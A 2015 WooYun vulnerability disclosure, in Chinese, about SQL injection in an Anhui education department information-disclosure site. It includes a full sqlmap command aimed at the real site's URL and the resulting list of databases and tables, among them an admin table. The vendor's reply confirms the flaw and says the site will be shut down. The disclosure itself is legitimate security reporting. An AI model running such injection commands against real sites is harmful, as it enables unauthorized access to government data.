安徽省教育厅信息中心SQL注射漏洞一只 | wooyun-2015-0133992

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0133992

漏洞标题：

安徽省教育厅信息中心SQL注射漏洞一只

漏洞详情

披露状态：

2015-08-14：细节已通知厂商并且等待厂商处理中
2015-08-14：厂商已经确认，细节仅向厂商公开
2015-08-18：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

安徽省教育厅信息中心SQL注射漏洞一只

详细说明：

注射命令

sqlmap.py -u "http://zwgk.ahedu.gov.cn/XxgkWeb/index.aspx?
xxfl_id=1503&sort=1&name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C4%BC%EF
%BF%BD" --dbs

脱出数据如下

available databases [9]:
[*] ah_infopublic20091118
[*] computer
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] tgjs
Database: ah_infopublic20091118
[22 tables]
+------------------------+
| ah_admin               |
| ah_annex               |
| ah_apply               |
| ah_depart              |
| ah_gkzn                |
| ah_roles               |
| ah_subject             |
| ah_unit                |
| ah_user2               |
| ah_user2               |
| ah_xxcheck             |
| ah_xxfl2               |
| ah_xxfl2               |
| ah_xxnb                |
| ah_xxnr2012            |
| ah_xxnr_2222222        |
| ah_xxnr_2222222        |
| dtproperties           |
| sysconstraints         |
| syssegments            |
| infopublic2009.D99_CMD |
| infopublic2009.D99_Tmp |
+------------------------+

ah_admin跑字段得出管理员账号是admin密码最后一位却是个问号，也不知道什么鬼，刚好我怕查水表，渗透到此为止，不深入，但是黑帽拿来那可就难说了，安徽省教育厅啊。。。。

漏洞证明：

综上，表示未深入渗透，拒绝水表

修复方案：

你们懂

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-08-14 19:00

厂商回复：

这个网站是以前省政府统一下发的老信息公开网站，现在整体功能已经合并到我们主站里了，旧网站已经停止更新。我看了下保留的源码，想想还是不吐槽了，最终我们决定关停这个网站。感谢您的关注，欢迎对我们其他网站进行测试，谢谢。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源冷白开。@乌云